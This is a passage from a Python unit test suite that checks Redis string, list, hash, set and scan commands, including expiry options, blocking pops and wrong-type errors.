self.assertEqual(self.redis.get('foo'), b'bar')
def test_setex_using_float(self):
self.assertRaisesRegexp(
redis.ResponseError, 'integer', self.redis.setex, 'foo', 1.2,
'bar')
def test_set_ex(self):
self.assertEqual(self.redis.set('foo', 'bar', ex=100), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_ex_using_timedelta(self):
self.assertEqual(
self.redis.set('foo', 'bar', ex=timedelta(seconds=100)), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_px(self):
self.assertEqual(self.redis.set('foo', 'bar', px=100), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_px_using_timedelta(self):
self.assertEqual(
self.redis.set('foo', 'bar', px=timedelta(milliseconds=100)), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_raises_wrong_ex(self):
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', ex=-100)
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', ex=0)
self.assertFalse(self.redis.exists('foo'))
def test_set_using_timedelta_raises_wrong_ex(self):
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', ex=timedelta(seconds=-100))
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', ex=timedelta(seconds=0))
self.assertFalse(self.redis.exists('foo'))
def test_set_raises_wrong_px(self):
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', px=-100)
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', px=0)
self.assertFalse(self.redis.exists('foo'))
def test_set_using_timedelta_raises_wrong_px(self):
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', px=timedelta(milliseconds=-100))
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', px=timedelta(milliseconds=0))
self.assertFalse(self.redis.exists('foo'))
def test_setex_raises_wrong_ex(self):
with self.assertRaises(ResponseError):
self.redis.setex('foo', -100, 'bar')
with self.assertRaises(ResponseError):
self.redis.setex('foo', 0, 'bar')
self.assertFalse(self.redis.exists('foo'))
def test_setex_using_timedelta_raises_wrong_ex(self):
with self.assertRaises(ResponseError):
self.redis.setex('foo', timedelta(seconds=-100), 'bar')
with self.assertRaises(ResponseError):
self.redis.setex('foo', timedelta(seconds=-100), 'bar')
self.assertFalse(self.redis.exists('foo'))
def test_setnx(self):
self.assertEqual(self.redis.setnx('foo', 'bar'), True)
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.setnx('foo', 'baz'), False)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_delete(self):
self.redis['foo'] = 'bar'
self.assertEqual(self.redis.delete('foo'), True)
self.assertEqual(self.redis.get('foo'), None)
def test_echo(self):
self.assertEqual(self.redis.echo(b'hello'), b'hello')
self.assertEqual(self.redis.echo('hello'), b'hello')
@attr('slow')
def test_delete_expire(self):
self.redis.set("foo", "bar", ex=1)
self.redis.delete("foo")
self.redis.set("foo", "bar")
sleep(2)
self.assertEqual(self.redis.get("foo"), b'bar')
def test_delete_multiple(self):
self.redis['one'] = 'one'
self.redis['two'] = 'two'
self.redis['three'] = 'three'
# Since redis>=2.7.6 returns number of deleted items.
self.assertEqual(self.redis.delete('one', 'two'), 2)
self.assertEqual(self.redis.get('one'), None)
self.assertEqual(self.redis.get('two'), None)
self.assertEqual(self.redis.get('three'), b'three')
self.assertEqual(self.redis.delete('one', 'two'), False)
# If any keys are deleted, True is returned.
self.assertEqual(self.redis.delete('two', 'three'), True)
self.assertEqual(self.redis.get('three'), None)
def test_delete_nonexistent_key(self):
self.assertEqual(self.redis.delete('foo'), False)
# Tests for the list type.
def test_rpush_then_lrange_with_nested_list1(self):
self.assertEqual(self.redis.rpush('foo', [long(12345), long(6789)]), 1)
self.assertEqual(self.redis.rpush('foo', [long(54321), long(9876)]), 2)
self.assertEqual(self.redis.lrange(
'foo', 0, -1), ['[12345L, 6789L]', '[54321L, 9876L]'] if PY2 else
[b'[12345, 6789]', b'[54321, 9876]'])
def test_rpush_then_lrange_with_nested_list2(self):
self.assertEqual(self.redis.rpush('foo', [long(12345), 'banana']), 1)
self.assertEqual(self.redis.rpush('foo', [long(54321), 'elephant']), 2)
self.assertEqual(self.redis.lrange(
'foo', 0, -1),
['[12345L, \'banana\']', '[54321L, \'elephant\']'] if PY2 else
[b'[12345, \'banana\']', b'[54321, \'elephant\']'])
def test_rpush_then_lrange_with_nested_list3(self):
self.assertEqual(self.redis.rpush('foo', [long(12345), []]), 1)
self.assertEqual(self.redis.rpush('foo', [long(54321), []]), 2)
self.assertEqual(self.redis.lrange(
'foo', 0, -1), ['[12345L, []]', '[54321L, []]'] if PY2 else
[b'[12345, []]', b'[54321, []]'])
def test_lpush_then_lrange_all(self):
self.assertEqual(self.redis.lpush('foo', 'bar'), 1)
self.assertEqual(self.redis.lpush('foo', 'baz'), 2)
self.assertEqual(self.redis.lpush('foo', 'bam', 'buzz'), 4)
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'buzz', b'bam', b'baz', b'bar'])
def test_lpush_then_lrange_portion(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'two')
self.redis.lpush('foo', 'three')
self.redis.lpush('foo', 'four')
self.assertEqual(self.redis.lrange('foo', 0, 2),
[b'four', b'three', b'two'])
self.assertEqual(self.redis.lrange('foo', 0, 3),
[b'four', b'three', b'two', b'one'])
def test_lpush_key_does_not_exist(self):
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lpush_with_nonstr_key(self):
self.redis.lpush(1, 'one')
self.redis.lpush(1, 'two')
self.redis.lpush(1, 'three')
self.assertEqual(self.redis.lrange(1, 0, 2),
[b'three', b'two', b'one'])
self.assertEqual(self.redis.lrange('1', 0, 2),
[b'three', b'two', b'one'])
def test_lpush_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lpush('foo', 'element')
def test_llen(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'two')
self.redis.lpush('foo', 'three')
self.assertEqual(self.redis.llen('foo'), 3)
def test_llen_no_exist(self):
self.assertEqual(self.redis.llen('foo'), 0)
def test_llen_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.llen('foo')
def test_lrem_positive_count(self):
self.redis.lpush('foo', 'same')
self.redis.lpush('foo', 'same')
self.redis.lpush('foo', 'different')
self.redis.lrem('foo', 2, 'same')
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'different'])
def test_lrem_negative_count(self):
self.redis.lpush('foo', 'removeme')
self.redis.lpush('foo', 'three')
self.redis.lpush('foo', 'two')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'removeme')
self.redis.lrem('foo', -1, 'removeme')
# Should remove it from the end of the list,
# leaving the 'removeme' from the front of the list alone.
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'removeme', b'one', b'two', b'three'])
def test_lrem_zero_count(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 0, 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lrem_default_value(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 0, 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lrem_does_not_exist(self):
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 0, 'one')
# These should be noops.
self.redis.lrem('foo', -2, 'one')
self.redis.lrem('foo', 2, 'one')
def test_lrem_return_value(self):
self.redis.lpush('foo', 'one')
count = self.redis.lrem('foo', 0, 'one')
self.assertEqual(count, 1)
self.assertEqual(self.redis.lrem('foo', 0, 'one'), 0)
def test_lrem_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lrem('foo', 0, 'element')
def test_rpush(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('foo', 'three')
self.redis.rpush('foo', 'four', 'five')
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'one', b'two', b'three', b'four', b'five'])
def test_rpush_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.rpush('foo', 'element')
def test_lpop(self):
self.assertEqual(self.redis.rpush('foo', 'one'), 1)
self.assertEqual(self.redis.rpush('foo', 'two'), 2)
self.assertEqual(self.redis.rpush('foo', 'three'), 3)
self.assertEqual(self.redis.lpop('foo'), b'one')
self.assertEqual(self.redis.lpop('foo'), b'two')
self.assertEqual(self.redis.lpop('foo'), b'three')
def test_lpop_empty_list(self):
self.redis.rpush('foo', 'one')
self.redis.lpop('foo')
self.assertEqual(self.redis.lpop('foo'), None)
# Verify what happens if we try to pop from a key
# we've never seen before.
self.assertEqual(self.redis.lpop('noexists'), None)
def test_lpop_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lpop('foo')
def test_lset(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('foo', 'three')
self.redis.lset('foo', 0, 'four')
self.redis.lset('foo', -2, 'five')
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'four', b'five', b'three'])
def test_lset_index_out_of_range(self):
self.redis.rpush('foo', 'one')
with self.assertRaises(redis.ResponseError):
self.redis.lset('foo', 3, 'three')
def test_lset_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lset('foo', 0, 'element')
def test_rpushx(self):
self.redis.rpush('foo', 'one')
self.redis.rpushx('foo', 'two')
self.redis.rpushx('bar', 'three')
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'one', b'two'])
self.assertEqual(self.redis.lrange('bar', 0, -1), [])
def test_rpushx_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.rpushx('foo', 'element')
def test_ltrim(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('foo', 'three')
self.redis.rpush('foo', 'four')
self.assertTrue(self.redis.ltrim('foo', 1, 3))
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'two', b'three',
b'four'])
self.assertTrue(self.redis.ltrim('foo', 1, -1))
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'three', b'four'])
def test_ltrim_with_non_existent_key(self):
self.assertTrue(self.redis.ltrim('foo', 0, -1))
def test_ltrim_expiry(self):
self.redis.rpush('foo', 'one', 'two', 'three')
self.redis.expire('foo', 10)
self.redis.ltrim('foo', 1, 2)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_ltrim_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.ltrim('foo', 1, -1)
def test_lindex(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.lindex('foo', 0), b'one')
self.assertEqual(self.redis.lindex('foo', 4), None)
self.assertEqual(self.redis.lindex('bar', 4), None)
def test_lindex_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lindex('foo', 0)
def test_lpushx(self):
self.redis.lpush('foo', 'two')
self.redis.lpushx('foo', 'one')
self.redis.lpushx('bar', 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'one', b'two'])
self.assertEqual(self.redis.lrange('bar', 0, -1), [])
def test_lpushx_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lpushx('foo', 'element')
def test_rpop(self):
self.assertEqual(self.redis.rpop('foo'), None)
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.rpop('foo'), b'two')
self.assertEqual(self.redis.rpop('foo'), b'one')
self.assertEqual(self.redis.rpop('foo'), None)
def test_rpop_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.rpop('foo')
def test_linsert_before(self):
self.redis.rpush('foo', 'hello')
self.redis.rpush('foo', 'world')
self.assertEqual(self.redis.linsert('foo', 'before', 'world', 'there'),
3)
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'hello', b'there', b'world'])
def test_linsert_after(self):
self.redis.rpush('foo', 'hello')
self.redis.rpush('foo', 'world')
self.assertEqual(self.redis.linsert('foo', 'after', 'hello', 'there'),
3)
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'hello', b'there', b'world'])
def test_linsert_no_pivot(self):
self.redis.rpush('foo', 'hello')
self.redis.rpush('foo', 'world')
self.assertEqual(self.redis.linsert('foo', 'after', 'goodbye', 'bar'),
-1)
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'hello', b'world'])
def test_linsert_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.linsert('foo', 'after', 'bar', 'element')
def test_rpoplpush(self):
self.assertEqual(self.redis.rpoplpush('foo', 'bar'), None)
self.assertEqual(self.redis.lpop('bar'), None)
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('bar', 'one')
self.assertEqual(self.redis.rpoplpush('foo', 'bar'), b'two')
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'one'])
self.assertEqual(self.redis.lrange('bar', 0, -1), [b'two', b'one'])
# Catch instances where we store bytes and strings inconsistently
# and thus bar = ['two', b'one']
self.assertEqual(self.redis.lrem('bar', -1, 'two'), 1)
def test_rpoplpush_to_nonexistent_destination(self):
self.redis.rpush('foo', 'one')
self.assertEqual(self.redis.rpoplpush('foo', 'bar'), b'one')
self.assertEqual(self.redis.rpop('bar'), b'one')
def test_rpoplpush_expiry(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('bar', 'two')
self.redis.expire('bar', 10)
self.redis.rpoplpush('foo', 'bar')
self.assertGreater(self.redis.ttl('bar'), 0)
def test_rpoplpush_one_to_self(self):
self.redis.rpush('list', 'element')
self.assertEqual(self.redis.brpoplpush('list', 'list'), b'element')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
def test_rpoplpush_wrong_type(self):
self.redis.set('foo', 'bar')
self.redis.rpush('list', 'element')
with self.assertRaises(redis.ResponseError):
self.redis.rpoplpush('foo', 'list')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
with self.assertRaises(redis.ResponseError):
self.redis.rpoplpush('list', 'foo')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
def test_blpop_single_list(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('foo', 'three')
self.assertEqual(self.redis.blpop(['foo'], timeout=1),
(b'foo', b'one'))
def test_blpop_test_multiple_lists(self):
self.redis.rpush('baz', 'zero')
self.assertEqual(self.redis.blpop(['foo', 'baz'], timeout=1),
(b'baz', b'zero'))
self.assertFalse(self.redis.exists('baz'))
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
# bar has nothing, so the returned value should come
# from foo.
self.assertEqual(self.redis.blpop(['bar', 'foo'], timeout=1),
(b'foo', b'one'))
self.redis.rpush('bar', 'three')
# bar now has something, so the returned value should come
# from bar.
self.assertEqual(self.redis.blpop(['bar', 'foo'], timeout=1),
(b'bar', b'three'))
self.assertEqual(self.redis.blpop(['bar', 'foo'], timeout=1),
(b'foo', b'two'))
def test_blpop_allow_single_key(self):
# blpop converts single key arguments to a one element list.
self.redis.rpush('foo', 'one')
self.assertEqual(self.redis.blpop('foo', timeout=1), (b'foo', b'one'))
def test_blpop_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.blpop('foo', timeout=1)
def test_brpop_test_multiple_lists(self):
self.redis.rpush('baz', 'zero')
self.assertEqual(self.redis.brpop(['foo', 'baz'], timeout=1),
(b'baz', b'zero'))
self.assertFalse(self.redis.exists('baz'))
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.brpop(['bar', 'foo'], timeout=1),
(b'foo', b'two'))
def test_brpop_single_key(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.brpop('foo', timeout=1),
(b'foo', b'two'))
def test_brpop_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.brpop('foo', timeout=1)
def test_brpoplpush_multi_keys(self):
self.assertEqual(self.redis.lpop('bar'), None)
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.brpoplpush('foo', 'bar', timeout=1),
b'two')
self.assertEqual(self.redis.lrange('bar', 0, -1), [b'two'])
# Catch instances where we store bytes and strings inconsistently
# and thus bar = ['two']
self.assertEqual(self.redis.lrem('bar', -1, 'two'), 1)
def test_brpoplpush_wrong_type(self):
self.redis.set('foo', 'bar')
self.redis.rpush('list', 'element')
with self.assertRaises(redis.ResponseError):
self.redis.brpoplpush('foo', 'list')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
with self.assertRaises(redis.ResponseError):
self.redis.brpoplpush('list', 'foo')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
@attr('slow')
def test_blocking_operations_when_empty(self):
self.assertEqual(self.redis.blpop(['foo'], timeout=1),
None)
self.assertEqual(self.redis.blpop(['bar', 'foo'], timeout=1),
None)
self.assertEqual(self.redis.brpop('foo', timeout=1),
None)
self.assertEqual(self.redis.brpoplpush('foo', 'bar', timeout=1),
None)
def test_empty_list(self):
self.redis.rpush('foo', 'bar')
self.redis.rpop('foo')
self.assertFalse(self.redis.exists('foo'))
# Tests for the hash type.
def test_hstrlen_missing(self):
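# hstrlen returns 0 for a missing key as well as for a missing field.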
self.assertEqual(self.redis.hstrlen('foo', 'doesnotexist'), 0)
self.redis.hset('foo', 'key', 'value')
self.assertEqual(self.redis.hstrlen('foo', 'doesnotexist'), 0)
def test_hstrlen(self):
self.redis.hset('foo', 'key', 'value')
self.assertEqual(self.redis.hstrlen('foo', 'key'), 5)
def test_hset_then_hget(self):
self.assertEqual(self.redis.hset('foo', 'key', 'value'), 1)
self.assertEqual(self.redis.hget('foo', 'key'), b'value')
def test_hset_update(self):
self.assertEqual(self.redis.hset('foo', 'key', 'value'), 1)
self.assertEqual(self.redis.hset('foo', 'key', 'value'), 0)
def test_hset_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hset('foo', 'key', 'value')
def test_hgetall(self):
self.assertEqual(self.redis.hset('foo', 'k1', 'v1'), 1)
self.assertEqual(self.redis.hset('foo', 'k2', 'v2'), 1)
self.assertEqual(self.redis.hset('foo', 'k3', 'v3'), 1)
self.assertEqual(self.redis.hgetall('foo'), {b'k1': b'v1',
b'k2': b'v2',
b'k3': b'v3'})
def test_hgetall_with_tuples(self):
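# Non-string fields and values are stored as the bytes of their str()
# representation.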
self.assertEqual(self.redis.hset('foo', (1, 2), (1, 2, 3)), 1)
self.assertEqual(self.redis.hgetall('foo'), {b'(1, 2)': b'(1, 2, 3)'})
def test_hgetall_empty_key(self):
self.assertEqual(self.redis.hgetall('foo'), {})
def test_hgetall_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hgetall('foo')
def test_hexists(self):
self.redis.hset('foo', 'bar', 'v1')
self.assertEqual(self.redis.hexists('foo', 'bar'), 1)
self.assertEqual(self.redis.hexists('foo', 'baz'), 0)
self.assertEqual(self.redis.hexists('bar', 'bar'), 0)
def test_hexists_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hexists('foo', 'key')
def test_hkeys(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.assertEqual(set(self.redis.hkeys('foo')), set([b'k1', b'k2']))
self.assertEqual(set(self.redis.hkeys('bar')), set([]))
def test_hkeys_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hkeys('foo')
def test_hlen(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.assertEqual(self.redis.hlen('foo'), 2)
def test_hlen_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hlen('foo')
def test_hvals(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.assertEqual(set(self.redis.hvals('foo')), set([b'v1', b'v2']))
self.assertEqual(set(self.redis.hvals('bar')), set([]))
def test_hvals_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hvals('foo')
def test_hmget(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.redis.hset('foo', 'k3', 'v3')
# Normal case.
self.assertEqual(self.redis.hmget('foo', ['k1', 'k3']), [b'v1', b'v3'])
self.assertEqual(self.redis.hmget('foo', 'k1', 'k3'), [b'v1', b'v3'])
# Key does not exist.
self.assertEqual(self.redis.hmget('bar', ['k1', 'k3']), [None, None])
self.assertEqual(self.redis.hmget('bar', 'k1', 'k3'), [None, None])
# Some keys in the hash do not exist.
self.assertEqual(self.redis.hmget('foo', ['k1', 'k500']),
[b'v1', None])
self.assertEqual(self.redis.hmget('foo', 'k1', 'k500'),
[b'v1', None])
def test_hmget_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hmget('foo', 'key1', 'key2')
def test_hdel(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.redis.hset('foo', 'k3', 'v3')
self.assertEqual(self.redis.hget('foo', 'k1'), b'v1')
self.assertEqual(self.redis.hdel('foo', 'k1'), True)
self.assertEqual(self.redis.hget('foo', 'k1'), None)
self.assertEqual(self.redis.hdel('foo', 'k1'), False)
# Since redis >= 2.7.6, hdel returns the number of deleted items.
self.assertEqual(self.redis.hdel('foo', 'k2', 'k3'), 2)
self.assertEqual(self.redis.hget('foo', 'k2'), None)
self.assertEqual(self.redis.hget('foo', 'k3'), None)
self.assertEqual(self.redis.hdel('foo', 'k2', 'k3'), False)
def test_hdel_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hdel('foo', 'key')
def test_hincrby(self):
self.redis.hset('foo', 'counter', 0)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 1)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 2)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 3)
def test_hincrby_with_no_starting_value(self):
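# A missing field is treated as 0 before the increment is applied.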
self.assertEqual(self.redis.hincrby('foo', 'counter'), 1)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 2)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 3)
def test_hincrby_with_range_param(self):
self.assertEqual(self.redis.hincrby('foo', 'counter', 2), 2)
self.assertEqual(self.redis.hincrby('foo', 'counter', 2), 4)
self.assertEqual(self.redis.hincrby('foo', 'counter', 2), 6)
def test_hincrby_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hincrby('foo', 'key', 2)
def test_hincrbyfloat(self):
self.redis.hset('foo', 'counter', 0.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 1.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 2.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 3.0)
def test_hincrbyfloat_with_no_starting_value(self):
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 1.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 2.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 3.0)
def test_hincrbyfloat_with_range_param(self):
self.assertAlmostEqual(
self.redis.hincrbyfloat('foo', 'counter', 0.1), 0.1)
self.assertAlmostEqual(
self.redis.hincrbyfloat('foo', 'counter', 0.1), 0.2)
self.assertAlmostEqual(
self.redis.hincrbyfloat('foo', 'counter', 0.1), 0.3)
def test_hincrbyfloat_on_non_float_value_raises_error(self):
self.redis.hset('foo', 'counter', 'cat')
with self.assertRaises(redis.ResponseError):
self.redis.hincrbyfloat('foo', 'counter')
def test_hincrbyfloat_with_non_float_amount_raises_error(self):
with self.assertRaises(redis.ResponseError):
self.redis.hincrbyfloat('foo', 'counter', 'cat')
def test_hincrbyfloat_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hincrbyfloat('foo', 'key', 0.1)
def test_hincrbyfloat_precision(self):
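# The value should round-trip through the hash with full float precision.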
x = 1.23456789123456789
self.assertEqual(self.redis.hincrbyfloat('foo', 'bar', x), x)
self.assertEqual(float(self.redis.hget('foo', 'bar')), x)
def test_hsetnx(self):
self.assertEqual(self.redis.hsetnx('foo', 'newkey', 'v1'), True)
self.assertEqual(self.redis.hsetnx('foo', 'newkey', 'v1'), False)
self.assertEqual(self.redis.hget('foo', 'newkey'), b'v1')
def test_hmset_empty_raises_error(self):
with self.assertRaises(redis.DataError):
self.redis.hmset('foo', {})
def test_hmset(self):
self.redis.hset('foo', 'k1', 'v1')
self.assertEqual(self.redis.hmset('foo', {'k2': 'v2', 'k3': 'v3'}),
True)
def test_hmset_convert_values(self):
self.redis.hmset('foo', {'k1': True, 'k2': 1})
self.assertEqual(
self.redis.hgetall('foo'), {b'k1': b'True', b'k2': b'1'})
def test_hmset_does_not_mutate_input_params(self):
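# hmset must not modify the caller's mapping in place.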
original = {'key': [123, 456]}
self.redis.hmset('foo', original)
self.assertEqual(original, {'key': [123, 456]})
def test_hmset_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hmset('foo', {'key': 'value'})
def test_empty_hash(self):
self.redis.hset('foo', 'bar', 'baz')
self.redis.hdel('foo', 'bar')
self.assertFalse(self.redis.exists('foo'))
def test_sadd(self):
self.assertEqual(self.redis.sadd('foo', 'member1'), 1)
self.assertEqual(self.redis.sadd('foo', 'member1'), 0)
self.assertEqual(self.redis.smembers('foo'), set([b'member1']))
self.assertEqual(self.redis.sadd('foo', 'member2', 'member3'), 2)
self.assertEqual(self.redis.smembers('foo'),
set([b'member1', b'member2', b'member3']))
self.assertEqual(self.redis.sadd('foo', 'member3', 'member4'), 1)
self.assertEqual(self.redis.smembers('foo'),
set([b'member1', b'member2', b'member3', b'member4']))
def test_sadd_as_str_type(self):
self.assertEqual(self.redis.sadd('foo', *range(3)), 3)
self.assertEqual(self.redis.smembers('foo'), set([b'0', b'1', b'2']))
def test_sadd_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sadd('foo', 'member2')
def test_scan_single(self):
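# A returned cursor of 0 means the scan completed in a single call.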
self.redis.set('foo1', 'bar1')
self.assertEqual(self.redis.scan(match="foo*"), (0, [b'foo1']))
def test_scan_iter_single_page(self):
self.redis.set('foo1', 'bar1')
self.redis.set('foo2', 'bar2')
self.assertEqual(set(self.redis.scan_iter(match="foo*")),
set([b'foo1', b'foo2']))
self.assertEqual(set(self.redis.scan_iter()),
set([b'foo1', b'foo2']))
self.assertEqual(set(self.redis.scan_iter(match="")),
set([]))
def test_scan_iter_multiple_pages(self):
all_keys = key_val_dict(size=100)
self.assertTrue(
all(self.redis.set(k, v) for k, v in all_keys.items()))
self.assertEqual(
set(self.redis.scan_iter()),
set(all_keys))
def test_scan_iter_multiple_pages_with_match(self):
all_keys = key_val_dict(size=100)
self.assertTrue(
all(self.redis.set(k, v) for k, v in all_keys.items()))
# Now add a few keys that don't match the key:<number> pattern.
self.redis.set('otherkey', 'foo')
self.redis.set('andanother', 'bar')
actual = set(self.redis.scan_iter(match='key:*'))
self.assertEqual(actual, set(all_keys))
def test_scan_multiple_pages_with_count_arg(self):
all_keys = key_val_dict(size=100)
self.assertTrue(
all(self.redis.set(k, v) for k, v in all_keys.items()))
self.assertEqual(
set(self.redis.scan_iter(count=1000)),
set(all_keys))
def test_scan_all_in_single_call(self):
all_keys = key_val_dict(size=100)
self.assertTrue(
all(self.redis.set(k, v) for k, v in all_keys.items()))
# Specify way more than the 100 keys we've added.
actual = self.redis.scan(count=1000)
self.assertEqual(set(actual[1]), set(all_keys))
self.assertEqual(actual[0], 0)
@attr('slow')
def test_scan_expired_key(self):
self.redis.set('expiringkey', 'value')
self.redis.pexpire('expiringkey', 1)
sleep(1)
self.assertEqual(self.redis.scan()[1], [])
def test_scard(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('foo', 'member2')
self.assertEqual(self.redis.scard('foo'), 2)
def test_scard_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.scard('foo')
def test_sdiff(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sdiff('foo', 'bar'), set([b'member1']))
# Original sets shouldn't be modified.
self.assertEqual(self.redis.smembers('foo'),
set([b'member1', b'member2']))
self.assertEqual(self.redis.smembers('bar'),
set([b'member2', b'member3']))
def test_sdiff_one_key(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.assertEqual(self.redis.sdiff('foo'),
set([b'member1', b'member2']))
def test_sdiff_empty(self):
